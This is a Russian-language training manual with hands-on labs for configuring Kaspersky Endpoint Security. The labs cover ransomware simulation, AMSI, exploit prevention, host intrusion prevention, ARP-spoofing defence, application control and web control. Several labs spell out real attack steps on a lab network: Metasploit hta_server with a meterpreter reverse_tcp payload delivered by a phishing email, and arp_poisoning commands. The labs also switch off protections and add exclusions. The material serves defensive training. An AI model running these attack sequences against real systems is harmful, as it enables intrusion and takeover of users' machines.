13. Откройте политику Kaspersky Endpoint Security для Windows
14. Перейдите на вкладку Application Settings

15. Перейдите в раздел General settings
16. Откройте настройки Exclusions and types
of detected objects
57
17. Чтобы добавить доверенное приложение, пройдите по ссылке Trusted applications в левой нижней
части экрана
19. В строке ввода пути

к исполняемому
файлу введите
%systemroot%\
system32\
WindowsPowershell\
v1.0\powershell.exe
20. Отключите опции:
— Do not scan files
before opening
— Do not inherit
restrictions of the
parent process
(application)
21. Включите опцию Do
not scan network
traffic с параметром
Encrypted traffic
only
22. Сохраните
исключения:
нажмите OK трижды
23. Сохраните политику:
нажмите Save
24. Подождите пока
политика
применится
58
Проверить защиту сетевых папок от программ-вымогателей
Задание C: Проверьте, что защита от веб-угроз не мешает загрузить тестовый файл

доверенной программе PowerShell по протоколу https
Еще раз загрузите файл eicar_com.zip с ресурса eicar.org с помощью программы PowerShell. Проверьте,
что защита от веб-угроз не блокирует тестовый вирус при загрузке через доверенное приложение.
25. Повторно загрузите файл eicar_com.zip по зашифрованному протоколу https. Выполните команду:
Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -OutFile
“C:\temp\eicar_com.zip”
26. Убедитесь, что файл был успешно сохранен:

перейдите в папку C:\temp\
27. Закройте окно PowerShell
Лабораторная работа показывает, как добавить стороннее приложение в список доверенных программ и не
проверять шифрованный сетевой трафик.
Опция Do not scan network traffic для доверенных программ распространяется на компоненты Защита от
почтовых угроз, Защита от веб-угроз и Веб-Контроль, и не распространяется на компоненты Сетевой экран
и Защита от сетевых угроз.
Проверить защиту сетевых папок от программ-
вымогателей
Сценарий. Заражение программой-вымогателем – это одна из наиболее популярных угроз. Если однажды
критичные данные, хранящиеся в папках общего доступа, будут зашифрованы программой-вымогателем,
то компания может потерять много денег. Для защиты от программ-вымогателей вы хотите использовать
компонент защиты Behavior Detection.
59
1. Имитируйте заражение вредоносной программой-вымогателем

2. Проверьте результаты работы компонента защиты Анализ поведения
3. Разрешите шифрование в сетевых папках общего доступа и настройте исключения для сетевых
устройств
4. Проверьте, что исключения для сетевых устройств работают корректно
Задание A: Имитируйте заражение вредоносной программой-вымогателем

Отключите другие компоненты защиты, которые могут заблокировать тестовый файл раньше, чем Behavior
Detection. Найдите на рабочем столе компьютера Alex-Desktop и запустите скрипт ransomware2.bat,
который шифрует и удаляет файлы в сетевых папках общего доступа.
Проверьте, что Kaspersky Endpoint Security восстановил файл invoice.txt, а пользователь Alex больше не
может модифицировать файлы на сетевой папке общего доступа.
Начните выполнять задание на компьютере Admin-Laptop.
1. Войдите в систему с логином ABC\Administrator и паролем Ka5per$Ky

60
5. Перейдите в раздел Application settings

6. В разделе Advanced Threat Protection выберите Host Intrusion Prevention
7. Выключите компонент защиты: Host Intrusion Prevention

9. В разделе
Essential
Threat
Protection
выберите
Firewall
61
10. Выключите
Firewall
12. Сохраните настройки. Нажмите Save

13. Подтвердите применение настроек. Нажмите Yes
14. Подождите пока политика применится
15. Перезагрузите компьютер Admin-Laptop

логином ABC\Alex и
17. Откройте папку
общего доступа
\\admin-laptop\temp
18. Убедитесь, что в
папке присутствует
файл invoice.txt
19. Найдите на рабочем столе файл ransomware2.bat, выполняющий действия, схожие с действиями
вредоносных программ-шифровальщиков
20. Запустите файл

ransomware2.bat
21. Просмотрите
содержимое папки
\\admin-laptop\temp
22. Откройте файл

invoice.txt.aes в
программе Блокнот
23. Убедитесь, что файл
invoice.txt.aes
зашифрован
24. Закройте Блокнот
62
25. Обновите
содержимое папки
\\admin-laptop\temp
invoice.txt был
восстановлен
В некоторых случаях файл invoice.txt не удаляется, т.к. компонент Behavior Detection блокирует
удаленное соединение, как только обнаруживает попытку шифрования, еще до того, как вредоносный
скрипт успевает удалить исходный файл.
27. Попробуйте удалить зашифрованный файл

28. Убедитесь, что вам отказано в доступе
Задание B: Проверьте результаты работы компонента Анализ Поведения

Откройте отчеты работы компонента защиты Анализ поведения на ноутбуке Admin-Laptop. Ознакомьтесь с
выполненными действиями компонента защиты.
29. Войдите в систему с логином ABC\Admin и паролем Ka5per$Ky

30. Вызовите интерфейс Kaspersky Endpoint Security
31. Откройте отчеты программы
32. Выберите Behavior Detection
33. Убедитесь, что вредоносная активность шифрования была заблокирована
63
Задание C: Разрешите шифрование в сетевых папках общего доступа и настройте

исключения для доверенных сетевых устройств
В некоторых случаях Behavior Detection может определить работу прикладных инженерно-
проектировочных программ как действия программ шифровальщиков-вымогателей. Чтобы избежать
ложноположительных срабатываний компонента защиты, рекомендуется добавлять компьютеры в
доверенные. Выберите Сервер администрирования и отредактируйте политику Kaspersky Endpoint Security.
Добавьте IP-адрес компьютера Alex-Desktop в список исключений компонента Behavior Detection.

37. Перейдите
на вкладку
Application
Settings
38. В разделе
Advanced
Threat
Protection
выберите
Behavior
Detection
64
39. Измените
настройки
защиты
папок
общего
доступа от
стороннего
шифрования
с Block
connection
на Notify
40. Нажмите
Add, чтобы
добавить
исключение
41. Добавьте исключение. Введите IP адрес рабочей

станции Alex-Desktop (10.28.0.200)
42. Дважды нажмите OK
43. Сохраните изменения в политике
Задание D: Проверьте, что исключения для доверенных сетевых устройств

работают корректно
44. Откройте папку

\\admin-laptop\temp\
45. Удалите файл
invoice.txt.aes
Если не получается
удалить файл,
65
Проверить Защиту от бесфайловых угроз
перезагрузите компьютер
Admin-Laptop
46. Найдите на рабочем

столе файл
ransomware2.bat и
запустите его
Если файл invoice.txt не

был восстановлен, то вы
можете его скопировать
из папки Documents

invoice.txt был
зашифрован и
изначальный файл
invoice.txt не был
восстановлен
48. Удалите файл
invoice.txt.aes
был удален
корректно
В этой лабораторной работе мы увидели, что Kaspersky Endpoint Security с настройками по умолчанию
умеет обнаруживать вредоносную активность вирусов шифровальщиков-вымогателей. Это происходит в
рамках задачи Анализ поведения.
В случае необходимости администратор всегда может задать исключения в компоненте защиты и

разрешать активность шифрования в папках общего доступа для сетевых устройств.
Сценарий. Вы хотите настроить Kaspersky Endpoint Security для защиты от угроз с применением
инструмента администрирования и управления операционной системой PowerShell. Злоумышленник может
запустить в пространстве памяти процесса PowerShell свой код. Бесфайловую атаку обнаружить
значительно сложнее, поскольку вредоносный код исполняется в памяти, в отличие от стандартных
вирусов, где вредоносные файлы сохраняются на локальном диске. В основном атаки с использованием
PowerShell являются следствием компрометации, которая началась с других вредоносных действий, как
правило с эксплуатации уязвимостей программного обеспечения.
1. Проверьте обнаружение бесфайловой угрозы при помощи интерфейса против вредоносного

сканирования AMSI.
66
Задание A: Проверьте обнаружение бесфайловой угрозы при помощи интерфейса

против вредоносного сканирования AMSI.
Запустите скрипт bsstest_amsi.ps1, который эмулирует активность бесфайловой угрозы.
Проверьте, что Kaspersky Endpoint Security обнаружил и заблокировал выполнение данного скрипта.

ABC\Admin и паролем
Ka5per$Ky
2. Откройте папку C:\temp
3. Разархивируйте
bsstest_amsi.zip
5. В поле ввода введите
powershell
6. Нажмите кнопку OK
7. Перейдите в папку разархивированного скрипта. Выполните команду

cd c:\temp\bsstest_amsi
8. Запустите тестовый PowerShell-скрипт. Выполните команду:

.\bsstest_amsi.ps1
67
Проверить Защиту от эксплойтов
9. Убедитесь, что Kaspersky Endpoint Security заблокировал исполнение скрипта
10. Откройте отчет Kaspersky Endpoint Security

11. Выберите AMSI Protection
12. Убедитесь, что Kaspersky Endpoint Security обнаружил и обезвредил угрозу
В лабораторной работе вы смогли убедиться, что Kaspersky Endpoint Security может эффективно
взаимодействовать со встроенными средствами интерпретации скриптов операционной системы Microsoft
Windows, обнаруживать и блокировать запуск вредоносного кода.
Сценарий. Эксплуатация уязвимостей для злоумышленника может быть значительно проще, чем принято
думать. С помощью инструмента Metasploit Framework, злоумышленник может создать эксплоит и
намеренно разослать его ничего не подозревающим сотрудникам компании.
1. Имитируйте хакерскую атаку и получите доступ к удаленному компьютеру

2. Отключите часть компонентов защиты
3. Проверьте защиту от эксплоитов
68
Задание A: Имитируйте хакерскую атаку и получите доступ к удаленному

компьютеру
Запустите на компьютере Kali утилиту для выполнения тестирования на проникновение Metasploit
Framework. Выполните атаку на HTA (HTML Application).
Компьютеры KSC, DC, Kali, Alex-Desktop и Admin-Laptop должны быть включены.

ABC\Alex и паролем Ka5per$Ky
2. Отключите Kaspersky Endpoint
Security. Правой кнопкой мыши
щелкните по значку Kaspersky
Endpoint Security в области
уведомлений. В контекстном меню
выберите: Exit
Переключитесь на компьютер Admin-Laptop.
3. Запустите утилиту Putty.exe

4. Подключитесь по SSH к хосту Kali (10.28.0.50) c
логином hacker и паролем Ka5per$Ky
69
5. Запустите консоль Metasploit Framework. Введите:

msfconsole
6. Введите no и нажмите Enter
7. Введите no и нажмите Enter
8. Дождитесь запуска Metasploit Framework

9. Выберите шаблон эксплойта. Выполните команду:
use exploit/windows/misc/hta_server
Для удобства ввода вы можете воспользоваться табуляцией
10. Отобразите список уязвимых приложений для данного эксплоита. Выполните команду:
show targets
11. Выберите атаку на 64-битную версию powershell. Выполните команду:

set target 1
12. Выберите вредоносную нагрузку. Выполните команду

set payload windows/x64/meterpreter/reverse_tcp
13. Задайте адрес слушающего сервера (адрес компьютера Kali). Введите команду
set lhost 10.28.0.50
14. Активируйте эксплойт. Выполните

команду
exploit -j
15. Скопируйте ссылку
http://10.28.0.50:8080/*******.hta в
буфер обмена (выделите с зажатой
левой кнопкой мыши необходимый
текст и кликните по выделенной
ссылке правой клавишей мыши)
70
16. Не закрывая текущей сессии, запустите Putty.exe и откройте новую сессию с Kali
17. Введите в терминале:
mailx -s "Report" -r administrator@abc.lab alex@abc.lab
18. Нажмите ENTER
19. Вставьте ссылку из пункта 15: http://10.28.0.50:8080/*******.hta. Для этого кликните в окне Putty правой
клавишей мыши
21. Введите одну точку
.
23. Откройте Thunderbird

24. Выберите полученное письмо
25. Откройте ссылку из письма в
браузере
26. Сохраните объект на компьютер
27. Запустите сохраненный файл

28. В окне предупреждения нажмите
Run
71
29. Откройте сессию Putty с консолью Metasploit Framework.

30. Убедитесь, что была открыта новая сессия
31. Отобразите доступные сессии командой

sessions
32. Для подключения к созданной

сессии выполните команду:
sessions 1
где 1 — номер созданной сессии
Вы получили доступ к удаленной машине Alex-Desktop
33. Чтобы запустить стандартную

оболочку командной строки
Windows, выполните команду:
shell
34. Выясните, под каким пользователем
инициализирована сессия,
командой
whoami
72
Задание B: Отключите часть компонентов защиты

В этом задании необходимо отключить некоторые компоненты защиты Kaspersky Endpoint Security, для
демонстрации защиты в сценарии с эксплоитом.

38. Перейдите
на вкладку
Application
Settings
39. Выключите
компоненты
защиты:
— KSN
— Behavior
Detection
73
40. Перейдите в раздел Essential Threat Protection

41. Выключите компоненты защиты:
— File Threat Protection
— Web Threat Protection
— Mail Threat Protection
— AMSI Protection
42. Перейдите в раздел Security Controls

43. Выключите компонент защиты Adaptive Anomaly Control
44. Чтобы сохранить политику, нажмите Save
45. Чтобы подтвердить применение настроек, нажмите Yes
46. Подождите, пока политика применится
74
Задание C: Проверьте защиту от эксплоитов

В этом задании необходимо проверить работу компонента Защита от эксплоитов.
47. Перезагрузите компьютер Alex-Desktop

48. Войдите в систему
49. Откройте основное окно Kaspersky Endpoint Security
50. Щелкните левой кнопкой мыши область Security
51. Убедитесь, что компонент Exploit Prevention

включен
52. Перейдите в папку Downloads

53. Запустите *.hta файл
54. Обратите внимание, что возникла ошибка

запуска файла
55. В окне Ошибка сценария нажмите No
75
56. Откройте отчеты Kaspersky Endpoint Security

57. Перейдите в отчеты компонента Exploit Prevention
58. Убедитесь, что эксплоит был обнаружен
59. Откройте окно Putty с сессией с запущенной консолью Metasploit Framework
60. Приостановите сессию в Shell: нажмите

CTRL+C
61. Подтвердите выход клавишей Y и нажмите
ENTER
62. Выполните команду:

sessions
Обратите внимание, что активных сессий к
компьютеру злоумышленника не установлено
63. Закройте все окна Putty.exe
В этой лабораторной работе мы убедились, что многоуровневая система защиты Kaspersky Endpoint
Security позволяет предотвращать сложные угрозы, когда основные компоненты программного обеспечения
отключены.
76
Настроить Предотвращение вторжений для защиты от программ-вымогателей

Настроить Предотвращение вторжений для защиты от
программ-вымогателей
Сценарий. Заражение программой-вымогателем – это одна из наиболее популярных угроз. Если однажды
критичные данные, хранящиеся на рабочих станциях, будут зашифрованы программой-вымогателем, то
компания может потерять много денег. Чтобы уменьшить риск, с помощью компонента предотвращение
вторжений запретите всем программам, кроме доверенных, менять документы на компьютерах.
1. Имитируйте заражение вредоносной программой-вымогателем

2. Запретите изменять и удалять документы всем программам, кроме доверенных
3. Настройте хранить события компонента предотвращение вторжений на Сервере
администрирования
4. Имитируйте шифрование документа и оцените результат
Задание A: Имитируйте заражение вредоносной программой-вымогателем

Найдите на рабочем столе компьютера Alex-Desktop и запустите скрипт ransomware.bat, который
шифрует и удаляет текстовый документ.
1. Войдите в систему под логином ABC\Alex с паролем Ka5per$Ky

2. Найдите на рабочем столе файлы ransomware.bat и invoice.txt
3. Запустите файл ransomware.bat

4. Проверьте, что на рабочем столе
больше нет файла invoice.txt, а вместо
него есть файл invoice.txt.aes
5. Откройте файл invoice.txt.aes в

программе Блокнот
6. Убедитесь, что файл invoice.txt.aes
зашифрован
7. Закройте Блокнот
8. Удалите файл invoice.txt.aes
77
Задание B: Запретите изменять и удалять документы всем программам, кроме

доверенных
Откройте настройки компонента Предотвращение вторжений в политике Kaspersky Endpoint Security.
Найдите список защищаемых ресурсов. Создайте категорию Documents. Добавьте в нее файлы с
расширением *.txt. Запретите всем программам, кроме доверенных, изменять, удалять и создавать файлы
из этой категории.

13. Перейдите на вкладку Application Settings

14. В разделе Advanced Threat Protection выберите Host Intrusion Prevention
78
компонент
Host Intrusion
Prevention
16. Откройте
список прав:
пройдите по
ссылке
Application
rights and
protected
resources
17. Добавьте
новую
категорию: в
левой панели
нажмите Add
18. Выберите параметр Category of protected resources

19. Укажите название Protected files
20. Пройдите по ссылке Operating system
79
21. Укажите подкатегорию Personal data

подкатегорию. В
левой панели
нажмите Add
24. Выберите параметр Category of protected resources

25. Укажите название Documents
27. Укажите подкатегорию Protected Files

80
29. Добавьте типы

файлов в категорию.
В левой панели
нажмите Add
30. В типе ресурсов выберите File or folder

31. В поле Path to file or folder введите *.txt, а в поле
Display name for the list of categories добавьте txt
33. Укажите подкатегорию Documents

35. Чтобы выбрать категорию Personal Data | Protected files, щелкните левой кнопкой мыши по пустому
полю рядом c названием Protected files (область выделена красным)
81
36. Запретите менять

файлы категории
программам с
репутацией Low и
High Restricted:
измените действие
для операций
Write, Delete и
Create на Block
37. Настройте
компонент
Предотвращение
вторжений
записывать, когда
программы
пытаются менять
документы:
включите Log
events: Write,
Delete и Create
для всех
запрещающих
действий
38. Сохраните права доступа: нажмите OK дважды

39. Сохраните политику: нажмите Save
40. Подтвердите применение настроек. Нажмите Yes
82
Задание C: Настройте хранить события компонента предотвращение вторжений

на Сервере администрирования
Откройте в политике настройки событий. Найдите информационные события компонента предотвращение
вторжений:
— Application placed in restricted group

— Host Intrusion Prevention was triggered.
Настройте политику хранить эти события на Сервере администрирования.
41. Откройте свойства политики Kaspersky Endpoint Security for Windows
42. Откройте вкладку Event configuration и перейдите в раздел Info

43. Нажмите Add event
83
44. Выберите события Application placed in

restricted group и Host Intrusion Prevention
was triggered
47. В боковом меню выберите Monitoring & Reporting | Event Selections

48. Для создания новой выборки событий нажмите Add
49. Введите имя

выборки Host
Intrusion
Prevention
Events
84
50. Перейдите в
раздел Events
51. В списке
название
программы
выберите
Kaspersky
Endpoint
Security
52. Укажите Уровень
критичности: Info
53. Отметьте опцию
Include selected
general events
54. Снимите отметки
со всех
отмеченных
чекбоксов на
каждой из 4х
страниц
55. Из списка событий выберите:

— Application placed in restricted group
— Host Intrusion Prevention was triggered
57. Снимите флажок Go to selection result и нажмите
Save
Задание D: Имитируйте шифрование документа и оцените результат

Найдите на рабочем столе компьютера Alex-Desktop и запустите скрипт ransomware.bat, который
шифрует и удаляет текстовый документ. Проверьте, что скрипт не удаляет текстовый файл.
Изучите на Сервере администрирования события компонента предотвращение вторжений. Убедитесь, что

компонент предотвращение вторжений не дал скрипту удалить текстовый документ.
58. Скопируйте на рабочий стол файл invoice.txt (копия находится в папке Documents)
85
59. Запустите файл ransomware.bat
60. Проверьте, что на рабочем столе появился файл invoice.txt.aes, но и файл invoice.txt никуда не
делся
Продолжите задание на компьютере Admin-Laptop.

63. Отметьте выборку событий Host Intrusion Prevention Events
64. Нажмите Reconfigure sorting and start, чтобы запустить выборку событий
65. Отсортируйте выборку по времени

возникшего события в порядке
возрастания
66. Нажмите Start
86
Проверить Защиту от сетевых атак
67. Изучите события в выборке. Найдите событие, которое говорит, что компонент Предотвращение
вторжений не дал программе удалить документ
Вы настроили компонент Предотвращение вторжений разрешать менять текстовые документы только

доверенным программам. Для защиты от программ-вымогателей, добавьте в категорию больше типов
документов: *.doc, *.docx, *.xlsx и т.д.
Программы от известных производителей, такие как Microsoft Office, относятся к доверенным, поэтому им
компонент Предотвращение вторжений не помешает. А вот программы-вымогатели, даже если их еще нет в
базе сигнатур или в KSN, в категорию доверенных не попадут и менять документы не смогут.

Сценарий. Вы хотите проверить работу компонента Защита от сетевых атак. Для этого Вы подключаетесь к
компьютеру Kali и запускаете с него атаку ARP Spoofing на компьютер Alex-Desktop. Kaspersky Endpoint
Security заблокирует атаку.
1. Включите защиту от атак типа MAC Spoofing

2. Имитируйте атаку по сети с компьютера Kali на компьютер Alex-Desktop
3. Изучите отчет о сетевых атаках
4. Завершите атаку
87
Задание A: Включите защиту от атак типа MAC Spoofing

Чтобы проверить защиту от атак, мы будем использовать утилиту для выполнения тестирования на
проникновение Metasploit Framework. В этом задании необходимо включить опцию MAC Spoofing Protection
компонента защиты Network Threat Protection.
Компьютеры KSC, DC, Kali, Alex-Desktop и Admin-Laptop должны быть включены.
1. Войдите в систему под логином ABC\Admin с паролем Ka5per$Ky


6. В разделе Essential Threat Protection выберите Network Threat Protection
88
7. Включите MAC Spoofing Protection в режиме Block

89
Задание B: Имитируйте атаку по сети с компьютера Kali на компьютер Alex-

Desktop
Запустите на компьютере Kali утилиту для выполнения тестирования на проникновение Metasploit
Framework.
Попытайтесь выдать компьютер Kali за шлюз по умолчанию и перенаправить трафик с Alex-Desktop на Kali -
настройте и запустите атаку ARP Spoofing.
10. Подключитесь к Kali по адресу 10.28.0.50 через утилиту Putty.exe с логином hacker и паролем
Ka5per$Ky
11. Запустите консоль Metasploit Framework. Выполните команду:
sudo msfconsole
12. Введите пароль Ka5per$Ky
13. Выберите шаблон эксплоита. Выполните команду:

use auxiliary/spoof/arp/arp_poisoning
14. Выберите компьютер Alex-Desktop в качестве атакуемого. Выполните команду:

set dhosts 10.28.0.200
90
15. Выберите шлюз по умолчанию в качестве узла, за который Metasploit будет себя выдавать. Введите
команду:
set shosts 10.28.0.1
16. Активируйте эксплоит. Выполните команду

exploit
Задание C: Изучите отчет о сетевых атаках

Найдите в консоли администрирования список отчетов. Создайте новый шаблон отчета типа Network
attack report. Создайте отчет, изучите подробности сетевой атаки, найдите адрес атакованной машины и
подробности атаки.

18. В боковом меню выберите Monitoring & Reporting | Reports
91
20. Назовите отчет Network Attack Report

21. Выберите тип отчета Report on network attacks в
разделе Threat statistics
24. Настройте выводить информацию за последние 30

дней
26. В окне сообщения выберите Save and run
92
27. Перейдите на вкладку Details
28. Найдите в отчете IP-адрес, который Metasploit пытался подменить

29. Закройте отчет
93
30. В боковом меню выберите Event Selections

31. Нажмите Add, чтобы создать новую выборку событий
32. Назовите выборку Network attacks
94
33. Перейдите в раздел Events

34. В поле Application name выберите Kaspersky Endpoint Security
35. В поле Severity level выберите Critical
36. Отметьте параметр Include selected general events
37. Снимите отметки со всех отмеченных чекбоксов на каждой из 5и страниц
38. В списке событий найдите и отметьте событие Network attack detected

39. Сохраните выборку событий: нажмите Save
40. В появившемся сообщении отметьте параметр Go to

selection result и нажмите Save
95
41. Изучите события в выборке – найдите MAC-адрес, с которого выполнялась атака
Задание D: Завершите атаку
42. Перейдите в окно Putty

43. Нажмите комбинацию клавиш Ctrl + C для завершения
атаки
44. Закройте окно Putty
Вы проверили защиту от сетевых атак и заблокировали атаку ARP Spoofing.
Кроме этого, вы создали новый отчет и новую выборку событий. В Kaspersky Security Center есть много
типов отчетов. Если вам не хватает отчетов, которые уже есть на закладке Отчеты, посмотрите какие еще
отчеты вы можете создать. Если нужного или удобного отчета нет, сделайте выборку интересных вам
событий. Настройте условия по типам событий, времени, группе компьютеров и т.д.
96
Настроить Контроль программ

Сценарий. Согласно политике безопасности, для доступа в Интернет пользователи компании должны
использовать только Google Chrome. Для этого браузера регулярно и централизованно загружаются все
доступные обновления безопасности, тогда как состояние других браузеров не контролируется. Учитывая,
что большинство современных угроз использует браузер для проникновения в сеть, было принято решение
запретить все прочие браузеры
Ваша задача — обеспечить выполнение требования политики безопасности. С помощью Контроля

программ необходимо заблокировать возможность запуска любых браузеров, за исключением Google
Chrome.
1. Создайте категорию для всех веб-браузеров кроме Google Chrome

2. Запретите пользователям запускать веб-браузеры, кроме Google Chrome
3. Запустите Mozilla Firefox и Google Chrome
97
Задание A: Создайте категорию для всех веб-браузеров кроме Google Chrome

Создайте категорию программ, содержащую все браузеры за исключением Google Chrome. Чтобы описать
все браузеры, используйте категории Лаборатории Касперского (KL-категория). Чтобы исключить Google
Chrome, используйте метаданные из файла chrome.exe.

3. В боковом меню выберите Operations | Third-party applications | Application categories
4. Чтобы добавить новую категорию, нажмите Add
5. Укажите имя категории Browsers

6. В методе создания категории выберите Category with content added manually
98
8. Чтобы добавить условие для категории нажмите Add
9. Укажите From KL category

11. Выберите категорию Browsers | Web Browsers

исключения из
категории.
Нажмите Add
99
15. В списке условий

исключений
укажите Hash,
metadata, or
certificate
16. В выпадающем
меню выберите
Specify manually
18. Переключите
условие на
использование
Metadata
19. Отметьте чекбокс
File Name
20. В поле введите
CHROME.EXE
(Важно: именно
заглавными
буквами)
23. Нажмите OK в окне
предупреждения
100
Задание B: Запретите пользователям запускать веб-браузеры, кроме Google

Chrome
Включите в политике контроль программ и выберите режим Блокировать (а не Уведомлять).
Добавьте правило, которое запрещает запускать программы из категории Browsers, которую вы создали в
предыдущем задании.

26. Перейдите на
вкладку
Application
settings
27. Перейдите в
раздел Security
Controls
28. Выберите
компонент
Application
Control
101
29. Включите компонент Application Control

30. Переключите компонент в режим блокировки: выберите опцию Kaspersky Endpoint Security for
Windows blocks startup of applications that are blocked by Application Control settings
31. Пройдите по ссылке Rules Lists Settings
категорию в
список
запрещенных.
Нажмите Add
102
33. Пройдите по
ссылке Please
choose a category
категорию
Browsers
36. Убедитесь, что

категория
Browsers
заблокирована
для всех
пользователей
103
использование
данной
категории, если
оно не было
включено
автоматически
дважды
политику:
нажмите Save и
Yes
41. Подождите, пока
политика
Задание C: Запустите Mozilla Firefox и Google Chrome

Убедитесь, что пользователи не могут запускать Mozilla Firefox, но могут запускать Google Chrome.

Ka5per$Ky
43. Запустите веб-браузер Mozilla
Firefox
44. Обратите внимание, что
Kaspersky Endpoint Security
блокирует запуск браузера
Firefox, о чем и сообщает
пользователю
45. Нажмите OK, чтобы закрыть

информационное окно
Windows
104
Заблокировать запуск неизвестных файлов в сети
46. Запустите браузер Google

Chrome
47. Убедитесь, что Kaspersky
Endpoint Security не блокирует
Google Chrome
При необходимости разрешить или заблокировать целый класс программ, удобно пользоваться
категориями Лаборатории Касперского. Они пополняются вместе с обновлениями, и всегда можно быть
уверенным в том, что следующая версия известного браузера автоматически будет добавлена в список.
При создании правил следует помнить, что запрещающие правила всегда имеют преимущество перед
разрешающими. Поэтому, если необходимо запретить категорию программ за исключением некоторых,
следует создавать одну категорию с исключением, что и было сделано в этой лабораторной работе. Любой
другой вариант не приведет к нужному результату.

Сценарий. Контроль программ, так же, как и компонент Предотвращение вторжений, позволяет уменьшить
риск запуска новых вредоносных программ. Чтобы уменьшить риск, с помощью контроля программ
запретите запуск всех файлов, кроме доверенных из определенных директорий операционной системы.
1. Создайте категорию программ, запрещающую запуск неизвестных файлов

2. Внесите изменения в политику, запретив всем пользователям запуск неизвестных файлов
3. Проверьте работу правил Контроля программ
105
Задание A: Создайте категорию программ, запрещающую запуск неизвестных

файлов
В этом задании необходимо создать категорию программ Protection_from_UnknownSoftware по пути к
программе и добавить в исключения все программы из категорий KL. В качестве путей к программам
используйте папки, которые, как правило, подвержены заражению и в которые чаще всего размещаются
вредоносные файлы.
Задание выполняется на компьютере KSC.

2. Перейдите на страницу Operations | Third-party applications | Application Categories
3. Нажмите Add, чтобы создать новую категорию
4. Введите имя категории

Protection_from_
UnknownSoftware
5. В методе создания
категории выберите
Category with content
added manually
106
7. Чтобы добавить условие,

нажмите Add
8. Откройте файл
Malware_Common_
Paths.txt в программе
Блокнот (файл находится
на рабочем столе)
9. Укажите Specify path to

application (masks
supported)
11. Выделите и скопируйте верхнюю строчку из файла Malware_Common_Paths.txt
12. Вставьте скопированную строчку и нажмите Next
13. Нажмите Add, чтобы

добавить остальные
значения
107
14. Самостоятельно вставьте

все остальные пути из
файла
Malware_Common_
Paths.txt
16. Добавьте исключения из категории. Нажмите Add
108
17. Укажите From KL category

19. Отметьте все KL-категории

109
22. Подтвердите создание

категории. Нажмите OK
110
Задание B: Внесите изменения в политику, запретив всем пользователям запуск

неизвестных файлов
Откройте настройки контроля программ в политике. Включите контроль программ и выберите режим
Блокировать (а не Уведомлять).
Создайте правило на базе категории Protection_from_UnknownSoftware, которое будет запрещать запуска

неизвестных программ.
23. В боковом меню выберите Devices | Polices & profiles

25. Перейдите в раздел

Application Settings
26. Перейдите в раздел Security
Controls
27. Выберите компонент
Application Control
111
28. Убедитесь, что Application Control переведен в блокирующий режим

29. Пройдите по ссылке Rules Lists Settings
112
31. Перейдите по
ссылке Please
choose a category
32. Из списка
представленных
категорий
выберите:
Protection_from_
UnknownSoftware
113
дважды
политику: нажмите
Save и Yes
37. Подождите, пока
политика
Задание C: Проверьте работу правил Контроля программ

В этом задании необходимо убедиться, что Kaspersky Endpoint Security блокирует запуск неизвестных
файлов.
38. Войдите в систему с логином ABC\Alex

и паролем Ka5per$Ky
39. Запустите программу ransomware.bat
двойным щелчком мыши
40. Обратите внимание, что KES блокирует
запуск ransomware.bat, о чем выводит
соответствующее сообщение
41. Нажмите OK, чтобы закрыть

информационное окно Windows
114


Controls
47. Выберите компонент
Application Control
48. Отключите компонент Application Control

В этой лабораторной рассмотрен один из вариантов контроля запуска новых файлов в сети, а также
наиболее быстрый вариант блокирования запуска этих файлов.
115
Настроить контроль доступа к веб-ресурсам

Сценарий. В ходе анализа интернет-трафика компании выяснилось, что многие пользователи посещают
сайты бирж криптовалют в рабочее время. Вы хотите запретить им это делать. Ваша задача —
заблокировать доступ к биржам криптовалют при помощи политики
1. Создайте правило блокировки доступа к биржам криптовалют

2. Проверьте работоспособность блокировки доступа к биржам криптовалют
3. Проверьте события Kaspersky Security Center
Задание A: Создайте правило блокировки доступа к биржам криптовалют

В этом задании нужно включить в политике блокировку доступа к сайтам криптовалют всем пользователям
в рабочее время.

2. Перейдите на страницу Devices | Polices & Profiles
116
Controls
6. Выберите компонент Web
Control
8. В поле Rule name введите Cryptocurrencies

9. В поле Action выберите Block
10. Отметьте чекбокс By content categories
11. Пройдите по ссылке Content Categories
117
12. В списке Content Categories | Electronic commerce выберите

Cryptocurrencies, mining
14. В секции Users Выберите параметр Apply

to individual users and / or groups
16. Выберите группу ABC\Admins

17. Нажмите Select
118
19. Убедитесь, что создано правило блокировки Cryptocurrencies

119
Задание B: Проверьте работоспособность блокировки доступа к биржам

криптовалют
В этом задании нужно убедиться, что правило вступило в силу, и категория Криптовалюты и майнинг
заблокирована.

24. Запустите Google Chrome
25. Зайдите на сайт
www.coinmarketcap.com
26. Убедитесь, что правило
блокировки доступа к биржам
криптовалют работает
27. Закройте окно Google Chrome
120
Задание C: Проверьте события Kaspersky Security Center

В этом задании ознакомьтесь с данными доступными в выборке событий Kaspersky Security Center.

30. Нажмите Recent Events
31. Выберите последнее событие с устройства Alex-Desktop
121
Настроить Адаптивный Контроль Аномалий
32. Обратите внимание, что доступ к сайту www.

coinmarketcap.com заблокирован Веб контролем
В этой лабораторной работе был рассмотрен функционал блокирования доступа к веб-ресурсам. Доступ
может разрешаться или блокироваться по категориям содержания, типу данных или и так, и так. Блокировка
доступа может быть ограничена по времени и распространяться на группы пользователей или на
отдельных пользователей. Типичные сценарии использования этого функционала — блокировка доступа к
социальным сетям, блокировка загрузки исполняемых файлов, или доступа к внешней электронной почте,
через которую может проходить как утечка информации, так и загрузка вредоносных объектов.

Сценарий. В Kaspersky Endpoint Security есть компонент, который отслеживает запуски скриптов и
макросов и обнаруживает системные аномалии. Вы решили проверить работоспособность данного
компонента защиты. Для этого вы используете заранее подготовленный файл Word с макросом, который
содержит обфусцированный PowerShell-скрипт.
1. Настройте блокировку запуска макросов и скриптов в офисных документах

2. Проверьте, что Адаптивный Контроль Аномалий блокирует запуск вредоносного макроса
122
Задание A: Настройте блокировку запуска макросов и скриптов в офисных

документах
Отключите основные компоненты защиты.
По умолчанию компонент защиты Адаптивный Контроль Аномалий работает в режиме статистики и

собирает статистику о запусках программ и скриптов. Чтобы проверить срабатывание компонента на
вредоносные файлы, его необходимо принудительно перевести в режим блокировки.

5. Выберите Security
Controls
6. Пройдите в настройки
компонента Adaptive
Anomaly Control
123
7. Включите компонент Adaptive Anomaly Control

8. Пройдите по ссылке Rules, чтобы настроить правила срабатывания
9. Разверните список правил: Activity of office applications

10. Переведите правила в режим блокировки. Измените действие с Smart на Block для следующих
правил:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
124
11. Сохраните политику:

